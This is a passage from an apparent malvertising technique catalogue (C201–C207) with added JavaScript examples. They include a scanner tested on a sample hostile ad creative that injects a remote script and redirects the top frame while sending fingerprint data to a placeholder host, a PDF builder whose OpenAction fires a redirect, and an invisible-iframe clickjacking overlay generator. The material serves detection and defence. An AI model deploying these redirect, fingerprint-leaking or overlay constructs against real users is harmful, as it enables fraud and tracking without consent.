[C201] JScript tag Injection
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
Procedure example: DarkHotel APT exploiting CVE-2019-1367
References [Confiant] DarkHotel APT exploiting CVE-2019-1367: https://blog.confiant.com/internet-explorer-cve-2019-1367-in-the-wild-exploitation-prelude-ef546f19cd30
[C202] WebAssembly injection
Technique Description: Malvertisers rely on WASM by introducing it into the execution of a page, ad creative, or other resource where it has no place in the legitimate execution of the application or ad.
Procedure example: Malvertisers quickly came up with multiple schemes to get miners into browsers, resulting in a large number of in-the-wild WebAssembly-based miners. These WASM miners appear to be minor variants of codebases available on GitHub. These ‘copycats’ are mostly tweaked to avoid detection, usually by altering function names or by completely removing references to the original C source.
References [Forcepoint] Browser mining coinhive and webassembly: https://www.forcepoint.com/blog/x-labs/browser-mining-coinhive-and-webassembly
[C203] HTML DOM modification
References [adtechmadness] How real-time malvertising solutions work. Examples with appendChild(): https://adtechmadness.wordpress.com/2019/03/26/how-real-time-malvertising-solutions-works
[C204] Forceful redirects
Technique Description: Forceful redirects are the technique by which malvertisers send victims to a malicious landing page without any action on the victim's part. Usually this is done by modifying the browser's Location object (window.location, or top.location from inside the ad's iframe) and explicitly pointing its href property at an attacker-controlled URL.
Procedure example: VeryMal campaign leveraged click trackers in their redirect chain in order to drop a malicious fake Flash update.
References [Confiant] Confiant & Malwarebytes Uncover Steganography Based Ad Payload That Drops Shlayer Trojan On Mac Users: https://blog.confiant.com/confiant-malwarebytes-uncover-steganography-based-ad-payload-that-drops-shlayer-trojan-on-mac-cd31e885c202
[Confiant] eGobbler forceful redirects: https://blog.confiant.com/hiding-in-plain-sight-how-one-malvertiser-abuses-typos-of-google-and-amazon-ad-serving-domains-6bfa6b42399d
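The four primitives above (C201 to C204) can all be recognised statically in an ad creative's markup and script. The following is an added example written for this page, not code from the original matrix or from any of the referenced reports: a small triage scanner with one pattern per primitive, run over a constructed creative. Rule names, the sample creative and the .invalid hostnames are all assumptions made for illustration.

```javascript
// Added example, not code from the original page: static triage of an ad
// creative for the primitives catalogued under C201-C204. Rule names and the
// sample creative are constructed; hostnames use the reserved .invalid TLD.

const RULES = [
  { id: 'C201', name: 'X-UA-Compatible meta forcing an old IE document mode (JScript)',
    re: /<meta[^>]+http-equiv\s*=\s*["']?x-ua-compatible["']?[^>]*content\s*=\s*["']?ie=\d+/i },
  { id: 'C202', name: 'WebAssembly compilation or instantiation',
    re: /\bWebAssembly\s*\.\s*(instantiate|compile|instantiateStreaming|compileStreaming|Module|Instance)\b/ },
  { id: 'C203', name: 'Script element created and attached through the DOM',
    re: /createElement\s*\(\s*["']script["']\s*\)[\s\S]{0,300}?\.(appendChild|insertBefore|append|prepend)\s*\(/ },
  { id: 'C204', name: 'Reference to the top or parent frame location',
    re: /\b(top|parent|window\.top|window\.parent)\s*\.\s*location\b/ },
  { id: 'C204', name: 'Navigation primitive (location.href assignment, replace or assign)',
    re: /\blocation\s*\.\s*(?:(?:replace|assign)\s*\(|href\s*=(?!=))/ },
  { id: 'C204', name: 'Meta refresh redirect',
    re: /<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]*url\s*=/i },
];

// One finding per matching rule, with the 1-based line of the first hit so an
// analyst can jump straight to it in the creative.
function scanCreative(source) {
  const findings = [];
  for (const rule of RULES) {
    const m = rule.re.exec(source);
    if (!m) continue;
    const line = source.slice(0, m.index).split('\n').length;
    findings.push({ id: rule.id, name: rule.name, line, snippet: m[0].slice(0, 80).trim() });
  }
  return findings;
}

// Constructed creative exhibiting C201, C203 and C204 (no WebAssembly).
const SAMPLE_CREATIVE = `
<meta http-equiv="X-UA-Compatible" content="IE=8">
<div id="ad"><img src="banner.png" alt=""></div>
<script>
  var s = document.createElement('script');
  s.src = 'https://cdn.example.invalid/loader.js';
  document.head.appendChild(s);
  var fp = navigator.userAgent + '|' + screen.width + 'x' + screen.height;
  setTimeout(function () {
    window.top.location.href = 'https://landing.example.invalid/?fp=' + encodeURIComponent(fp);
  }, 1500);
</script>`;

for (const f of scanCreative(SAMPLE_CREATIVE)) {
  console.log(`${f.id} line ${f.line}: ${f.name}  <${f.snippet}>`);
}
```

This is a review-time heuristic, not a control: a creative can build every one of these strings at runtime. The runtime control for C204 is serving the creative in an iframe whose sandbox attribute omits allow-top-navigation, so that top.location writes are refused by the browser regardless of what the script does.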
[C205] PDF redirect
Technique Description: PDF redirect is a redirect technique that uses a malicious PDF document which sends the victim to the attacker's URL when the document is opened in the browser. Typically the PDF is loaded automatically in order to bypass the browser's built-in redirect protection.
Procedure example: the Zirconium threat actor abused PDFium navigation actions through Chrome’s tabs API, circumventing Chrome's anti-redirect protection.
References [Confiant] Zirconium was one step ahead of Chrome's redirect blocker with 0-day: https://blog.confiant.com/zirconium-was-one-step-ahead-of-chromes-redirect-blocker-with-0-day-2d61802efd0d
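The generic PDF-level primitive behind a PDF redirect is a document whose /OpenAction is a /URI action, which the viewer fires as soon as the file opens. The block below is an added example written for this page, not code from the original matrix or from the Zirconium report, and it deliberately shows only that plain PDF-spec mechanism, not the Chrome/PDFium-specific behaviour Zirconium used. It builds such a document and adds two analyst-side checks: recovering the OpenAction target, and verifying that the cross-reference table actually points at the objects (hand-rolled or mutated files often get this wrong). The target URL is a placeholder.

```javascript
// Added example, not code from the original page: a minimal one-page PDF whose
// /OpenAction is a /URI action, plus two checks an analyst can run on a sample.
// The URL is a placeholder; non-Latin-1 characters in it are not handled.

function buildRedirectPdf(url) {
  // Literal strings in PDF are parenthesised; escape the delimiters and backslash.
  const esc = url.replace(/\\/g, '\\\\').replace(/\(/g, '\\(').replace(/\)/g, '\\)');
  const objects = [
    '<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>',     // 1: catalog, runs 4 0 R on open
    '<< /Type /Pages /Kids [3 0 R] /Count 1 >>',               // 2: page tree
    '<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>', // 3: one blank page
    `<< /Type /Action /S /URI /URI (${esc}) >>`,              // 4: the navigation action
  ];
  let out = '%PDF-1.4\n';
  const offsets = [];
  objects.forEach((body, i) => {
    offsets.push(Buffer.byteLength(out, 'latin1')); // byte offset of "N 0 obj"
    out += `${i + 1} 0 obj\n${body}\nendobj\n`;
  });
  const startxref = Buffer.byteLength(out, 'latin1');
  // xref entries are exactly 20 bytes: 10-digit offset, space, 5-digit generation, space, n|f, space, LF.
  out += `xref\n0 ${objects.length + 1}\n0000000000 65535 f \n`;
  for (const off of offsets) out += `${String(off).padStart(10, '0')} 00000 n \n`;
  out += `trailer\n<< /Size ${objects.length + 1} /Root 1 0 R >>\nstartxref\n${startxref}\n%%EOF\n`;
  return Buffer.from(out, 'latin1');
}

// Returns the URL an /OpenAction /URI action would open, or null if there is none.
// Handles both an indirect reference (/OpenAction 4 0 R) and an inline dictionary.
function extractOpenActionUri(pdf) {
  const text = pdf.toString('latin1');
  let dict = null;
  const ref = /\/OpenAction\s+(\d+)\s+\d+\s+R/.exec(text);
  if (ref) {
    const obj = new RegExp(`(?:^|\\n)${ref[1]} 0 obj\\s*<<([\\s\\S]*?)>>`).exec(text);
    dict = obj && obj[1];
  } else {
    const inline = /\/OpenAction\s*<<([\s\S]*?)>>/.exec(text);
    dict = inline && inline[1];
  }
  if (!dict || !/\/S\s*\/URI\b/.test(dict)) return null;
  const uri = /\/URI\s*\(((?:\\.|[^\\)])*)\)/.exec(dict);
  return uri ? uri[1].replace(/\\([()\\])/g, '$1') : null;
}

// True when every "n" entry in the xref table points at the start of "N 0 obj".
function xrefOffsetsValid(pdf) {
  const text = pdf.toString('latin1');
  const entries = [...text.matchAll(/^(\d{10}) 00000 n /gm)];
  return entries.length > 0 && entries.every((m, i) => text.startsWith(`${i + 1} 0 obj`, Number(m[1])));
}

const sample = buildRedirectPdf('https://landing.example.invalid/?ref=(ad)');
console.log('OpenAction target:', extractOpenActionUri(sample), 'xref valid:', xrefOffsetsValid(sample));
```

Opening the generated file in a browser's PDF viewer is a quick way to confirm whether that viewer's redirect protection covers document-initiated navigation; the same extractor can be pointed at any PDF served from an ad slot.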
[C206] Click Jacking
Technique Description: Click jacking is a technique used by malvertisers to hijack a user's click so that it lands on an invisible element controlled by the attacker. Threat actors overlay multiple transparent or opaque frames to trick a user into clicking on a button or link on another page. Clicks meant for the visible page are hijacked and routed to another, invisible page.
Procedure example: a clickjacking campaign that abused Google AdSense while avoiding ad-fraud bots.
References [Malwarebytes] clickjacking campaign abuses google adsense avoids adfraud bots: https://blog.malwarebytes.com/cybercrime/2017/01/clickjacking-campaign-abuses-google-adsense-avoids-ad-fraud-bots
[Confiant] how bad ads hijack your browser with one simple trick: https://blog.confiant.com/how-bad-ads-hijack-your-browser-with-one-simple-trick-712ad3590a13
[lookingglasscyber] when good sites go bad malvertising and watering holes infographic: https://www.lookingglasscyber.com/blog/threat-intelligence-insights/when-good-sites-go-bad-malvertising-and-watering-holes-infographic
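Whether the invisible page can be laid over the visible one at all depends on the target's framing policy, so the first check when assessing a clickjacking candidate is whether the attacker's origin is permitted to frame it. The block below is an added example written for this page, not code from the original matrix or the referenced posts: it shows the overlay markup the description refers to and a function that applies the X-Frame-Options and CSP frame-ancestors rules to a given embedder origin. The hostnames are placeholders, and the frame-ancestors matcher is simplified (a single policy header, no path matching).

```javascript
// Added example, not code from the original page. Hostnames are placeholders.

// The overlay the description refers to: the target page is framed at full size,
// made fully transparent and stacked above a visible decoy so clicks fall through.
function invisibleOverlayMarkup(targetUrl, decoyLabel) {
  return `<div style="position:relative;width:300px;height:250px">
  <button style="position:absolute;left:100px;top:100px">${decoyLabel}</button>
  <iframe src="${targetUrl}" style="position:absolute;left:0;top:0;width:300px;height:250px;opacity:0;z-index:2;border:0"></iframe>
</div>`;
}

function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : protocol === 'http:' ? '80' : '';
}

// Match one frame-ancestors source expression against the embedder's origin.
function sourceMatches(src, embedderUrl, pageUrl) {
  const e = new URL(embedderUrl);
  if (src === "'none'") return false;
  if (src === '*') return true;
  if (src === "'self'") return originOf(pageUrl) === originOf(embedderUrl);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return e.protocol === src.toLowerCase(); // scheme source, e.g. https:
  // host source: optional scheme, optional leading wildcard label, optional port
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:]+)(?::(\d+|\*))?$/i.exec(src);
  if (!m) return false;
  const [, scheme, wild, host, port] = m;
  if (scheme && e.protocol !== scheme.toLowerCase() + ':') return false;
  const h = e.hostname.toLowerCase(), want = host.toLowerCase();
  if (wild ? !h.endsWith('.' + want) : h !== want) return false;
  if (port && port !== '*' && (e.port || defaultPort(e.protocol)) !== port) return false;
  return true;
}

// Can a document at pageUrl, served with these headers, be framed by embedderUrl?
function isFrameable(headers, pageUrl, embedderUrl) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
  if (fa) {
    // When frame-ancestors is present, browsers ignore X-Frame-Options entirely.
    return fa.split(/\s+/).slice(1).some(s => sourceMatches(s, embedderUrl, pageUrl));
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return originOf(pageUrl) === originOf(embedderUrl);
  // Any other value (including the obsolete ALLOW-FROM) or no header: frameable.
  return true;
}

const target = 'https://bank.example.invalid/transfer';
const adFrame = 'https://ads.example.invalid/creative.html';
console.log('frameable with no headers:', isFrameable({}, target, adFrame));
console.log('frameable with DENY:', isFrameable({ 'X-Frame-Options': 'DENY' }, target, adFrame));
console.log(invisibleOverlayMarkup(target, 'Claim prize'));
```

The defensive reading is the same function run the other way: a page that should never sit inside an ad slot needs frame-ancestors 'none' (or at least X-Frame-Options: DENY), because an absent header is the permissive case.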
[C207] Web Socket
Technique Description: The WebSocket protocol, specified in RFC 6455, provides a way to exchange data between browser and server over a persistent connection. Data is passed in both directions as framed messages (“packets”) without closing the connection or issuing additional HTTP requests.
WebSockets suit services that need continuous data exchange, e.g. online games and real-time trading systems. Malvertisers use them to ship client-side data to a server they control and to execute whatever that server sends back.
Procedure example: DCCBoost used WebSockets to send client-side fingerprinting values to the server side and executed the payload it received in return.